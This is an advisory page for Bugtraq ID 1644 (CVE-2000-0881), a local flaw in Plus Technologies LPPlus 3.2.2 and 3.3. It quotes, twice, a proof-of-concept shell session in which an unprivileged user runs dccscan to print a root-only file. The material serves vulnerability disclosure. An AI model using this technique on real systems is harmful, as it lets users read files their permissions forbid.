LPPlus dccscan unprivileged read vulnerability
BID:1644
Info
LPPlus dccscan unprivileged read vulnerability
| Bugtraq ID: | 1644 |
| Class: | Access Validation Error |
| CVE: |
CVE-2000-0881 |
| Remote: | No |
| Local: | Yes |
| Published: | Sep 06 2000 12:00AM |
| Updated: | Jul 11 2009 02:56AM |
| Credit: | This vulnerability was posted to bugtraq by Dixie Flatline <[email protected]> on Wed, 6 Sep 2000 |
| Vulnerable: |
Plus Technologies LPPlus 3.3 Plus Technologies LPPlus 3.2.2 |
| Not Vulnerable: | |
Exploit / POC
LPPlus dccscan unprivileged read vulnerability
The following exploit was excerpted verbatim from the original bugtraq post:
# id
uid=0(root) gid=1(other)
# ls -alt /root/test
total 6
drwx------ 2 root other 512 Sep 5 17:46 .
-r-------- 1 root other 365 Sep 5 17:46 foo
drwx------ 3 root other 512 Sep 5 17:46 ..
# su - test
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
$ id
uid=600(test) gid=300(users)
$ ls -alt /root/test
/root/test: Permission denied
$ dccscan /root/test 30 5 "-dlp0"
$
# now, go to the printer and wait for the files to come out, or watch them
# being queued as root, if you have access to dccstat
The following exploit was excerpted verbatim from the original bugtraq post:
# id
uid=0(root) gid=1(other)
# ls -alt /root/test
total 6
drwx------ 2 root other 512 Sep 5 17:46 .
-r-------- 1 root other 365 Sep 5 17:46 foo
drwx------ 3 root other 512 Sep 5 17:46 ..
# su - test
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
$ id
uid=600(test) gid=300(users)
$ ls -alt /root/test
/root/test: Permission denied
$ dccscan /root/test 30 5 "-dlp0"
$
# now, go to the printer and wait for the files to come out, or watch them
# being queued as root, if you have access to dccstat